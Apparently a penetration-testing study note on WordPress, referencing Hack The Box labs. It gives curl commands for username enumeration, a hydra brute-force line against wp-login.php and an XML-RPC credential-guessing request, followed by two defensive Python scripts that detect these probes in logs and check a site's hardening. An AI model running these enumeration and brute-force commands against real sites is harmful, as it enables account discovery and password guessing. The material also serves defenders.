method

Username enum

METHOD 1

# Author ID enumeration: WordPress answers /?author=N with a 301 whose Location header is /author/<username>/
curl -s -I http://"$domain"/?author=1
# Increment the author value to collect further usernames
# Automation script: pull the author names straight out of the post listing
curl -s "$ip" | grep 'class="wp-block-post-author-name' | awk -F '__link">' '{print $2}' | awk -F '</a>' '{print $1}'

METHOD 2 (JQ)

curl -s http://blog.inlanefreight.com/wp-json/wp/v2/users | jq
# Paginated form for sites with many authors (per_page is capped at 100 by the REST API)
curl -s "http://blog.inlanefreight.com/index.php/wp-json/wp/v2/users/?per_page=100&page=1" | jq

METHOD 3 (hydra)

# The failure string "not registered on this site" only appears for unknown usernames, so every hit hydra reports is a valid login name
hydra -L /usr/share/seclists/Usernames/cirt-default-usernames.txt -p admin@123 "http-post-form://$domain/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fblog.bigbang.htb%2Fwp-admin%2F&testcookie=1:F=not registered on this site"

Login brute-force XMLRPC

Manual

curl -s -X POST -d "<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>admin</value></param><param><value>CORRECT-PASSWORD</value></param></params></methodCall>" http://"$domain"/xmlrpc.php
# A faultCode of 403 in the XML body means wrong credentials; valid credentials return the user's blog list instead

Automatic with tool

Is XMLRPC enabled?

CTF: HTB: Pressed | 0xdf hacks stuff

Get list of methods

Use methods

Interact with XMLRPC using python
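The three enumeration methods above and the XML-RPC password guessing all leave a distinctive trace in the web server access log. The following detection script is an added example, not code from the original notes: it parses constructed common-log-format lines and flags an IP that walks through several author IDs, any request to the REST users listing, and a burst of POSTs to xmlrpc.php. The thresholds (3 distinct author IDs, 20 POSTs) are assumptions to tune per site.

```python
"""Spot WordPress username enumeration and XML-RPC password guessing in web
server access logs.  Added example, not code from the original notes: the log
lines are constructed and the thresholds are assumptions to tune per site."""
import re
from collections import defaultdict

# Common-log-format lines (constructed).  203.0.113.5 walks /?author=N,
# 198.51.100.7 lists the REST users endpoint and then hammers xmlrpc.php,
# 192.0.2.9 is an ordinary visitor who hit a single author page.
_XMLRPC_BURST = "\n".join(
    f'198.51.100.7 - - [10/Jan/2024:10:01:{i:02d} +0000] "POST /xmlrpc.php HTTP/1.1" 200 403'
    for i in range(25)
)
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jan/2024:10:00:01 +0000] "GET /?author=1 HTTP/1.1" 301 0
203.0.113.5 - - [10/Jan/2024:10:00:02 +0000] "GET /?author=2 HTTP/1.1" 301 0
203.0.113.5 - - [10/Jan/2024:10:00:03 +0000] "GET /?author=3 HTTP/1.1" 404 0
203.0.113.5 - - [10/Jan/2024:10:00:04 +0000] "GET /?author=4 HTTP/1.1" 301 0
203.0.113.5 - - [10/Jan/2024:10:00:05 +0000] "GET /?author=5 HTTP/1.1" 404 0
198.51.100.7 - - [10/Jan/2024:10:00:50 +0000] "GET /wp-json/wp/v2/users?per_page=100&page=1 HTTP/1.1" 200 812
""" + _XMLRPC_BURST + """
192.0.2.9 - - [10/Jan/2024:10:02:00 +0000] "GET /?author=1 HTTP/1.1" 301 0
192.0.2.9 - - [10/Jan/2024:10:02:30 +0000] "GET /about/ HTTP/1.1" 200 5120
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
AUTHOR_RE = re.compile(r"[?&]author=(\d+)")
REST_USERS = "/wp-json/wp/v2/users"
XMLRPC = "/xmlrpc.php"


def analyze(log_text, author_threshold=3, xmlrpc_threshold=20):
    """Return sorted (ip, finding, count) tuples for the three behaviours."""
    author_ids = defaultdict(set)   # ip -> distinct author IDs requested
    rest_hits = defaultdict(int)    # ip -> requests to the REST users listing
    xmlrpc_posts = defaultdict(int) # ip -> POSTs to xmlrpc.php
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                # skip lines that are not access-log records
        ip, method, path = m["ip"], m["method"], m["path"]
        a = AUTHOR_RE.search(path)
        if a:
            author_ids[ip].add(int(a.group(1)))
        if REST_USERS in path:
            rest_hits[ip] += 1
        if method == "POST" and path.split("?")[0].endswith(XMLRPC):
            xmlrpc_posts[ip] += 1

    findings = []
    for ip, ids in author_ids.items():
        # One author page is normal browsing; a run of distinct IDs is a sweep
        if len(ids) >= author_threshold:
            findings.append((ip, "author-id-sweep", len(ids)))
    for ip, n in rest_hits.items():
        # Browsers never fetch this endpoint on their own; every hit is worth a look
        findings.append((ip, "rest-users-listing", n))
    for ip, n in xmlrpc_posts.items():
        # Legitimate XML-RPC clients (mobile app, Jetpack) do not POST dozens of times a minute
        if n >= xmlrpc_threshold:
            findings.append((ip, "xmlrpc-burst", n))
    return sorted(findings)


if __name__ == "__main__":
    for ip, kind, count in analyze(SAMPLE_LOG):
        print(f"{ip:15} {kind:20} {count}")
```

Feed it a real log with `analyze(open("access.log").read())`; the burst threshold is per file, so for a rolling window split the log by time first.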

Remote code execution (required credentials)

Payload

Exploit

Run commands

Leveraging known vulnerabilities

WordPress hardening

Update WordPress to the latest version

WordPress security plugins
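Whatever plugin or filter is used, the hardening is only done when the three disclosure paths above (the `/?author=N` redirect, the REST users listing and `xmlrpc.php`, the "Is XMLRPC enabled?" question) stop answering. The script below is an added example, not code from the original notes or from any plugin: the verdict functions decide from a status code and response whether each path is still open, and `check_site` runs them against a site URL given on the command line. The sample XML-RPC responses are constructed with `xmlrpc.client`, and the rules assume a hardened site drops the redirect, returns an empty or denied user list, and answers XML-RPC with a fault or a 4xx.

```python
"""Check whether the three WordPress disclosure paths from these notes are
closed: the /?author=N redirect, the REST users listing and xmlrpc.php.
Added example, not code from the original notes.  Sample responses are
constructed; the verdict rules are assumptions about how a hardened site
answers (no redirect, empty or denied user list, XML-RPC fault or 4xx)."""
import json
import sys
import urllib.error
import urllib.request
import xmlrpc.client
from xml.parsers.expat import ExpatError


# --- pure verdicts on (status, header/body), usable offline ----------------

def author_redirect_leaks(status, location):
    """A redirect from /?author=N into /author/<login>/ reveals the login name."""
    return status in (301, 302) and bool(location) and "/author/" in location


def rest_users_leaks(status, body):
    """A 200 carrying a non-empty JSON list of user objects is a username listing."""
    if status != 200:
        return False
    try:
        data = json.loads(body)
    except ValueError:
        return False
    return isinstance(data, list) and any(isinstance(u, dict) and "slug" in u for u in data)


def xmlrpc_enabled(status, body):
    """xmlrpc.php still serves methods if system.listMethods returns a method list."""
    if status != 200:
        return False
    try:
        (methods,), _ = xmlrpc.client.loads(body)   # raises Fault on a disabled site
    except (xmlrpc.client.Fault, xmlrpc.client.ResponseError, ExpatError, ValueError):
        return False
    return isinstance(methods, list) and "wp.getUsersBlogs" in methods


# Request body for the live probe, and two constructed responses for offline checks.
LISTMETHODS_CALL = xmlrpc.client.dumps((), "system.listMethods")
ENABLED_RESPONSE = xmlrpc.client.dumps(
    (["system.listMethods", "system.multicall", "wp.getUsersBlogs"],), methodresponse=True)
DISABLED_RESPONSE = xmlrpc.client.dumps(
    xmlrpc.client.Fault(405, "XML-RPC services are disabled on this site."))


# --- live probe against your own site --------------------------------------

class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Keep the 301 itself so its Location header can be inspected."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def _fetch(url, data=None, content_type=None):
    """Return (status, headers, body) without following redirects or raising on 4xx."""
    headers = {"User-Agent": "wp-hardening-check"}
    if content_type:
        headers["Content-Type"] = content_type
    req = urllib.request.Request(url, data=data, headers=headers)
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(req, timeout=10) as resp:
            return resp.status, resp.headers, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.headers, err.read().decode("utf-8", "replace")


def check_site(base):
    """Probe the three paths on a site you administer; True means still exposed."""
    base = base.rstrip("/")
    status, headers, _ = _fetch(base + "/?author=1")
    author = author_redirect_leaks(status, headers.get("Location"))
    status, _, body = _fetch(base + "/wp-json/wp/v2/users")
    rest = rest_users_leaks(status, body)
    status, _, body = _fetch(base + "/xmlrpc.php", LISTMETHODS_CALL.encode(), "text/xml")
    rpc = xmlrpc_enabled(status, body)
    return {"author_redirect_leaks": author, "rest_users_leaks": rest, "xmlrpc_enabled": rpc}


if __name__ == "__main__":
    for name, exposed in check_site(sys.argv[1]).items():
        print(f"{name}: {'EXPOSED' if exposed else 'ok'}")
```

Run it as `python3 check.py https://your-site.example` before and after applying the hardening; a site that still redirects `/?author=1`, lists users, or answers `system.listMethods` has not actually closed the path the plugin claims to close.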
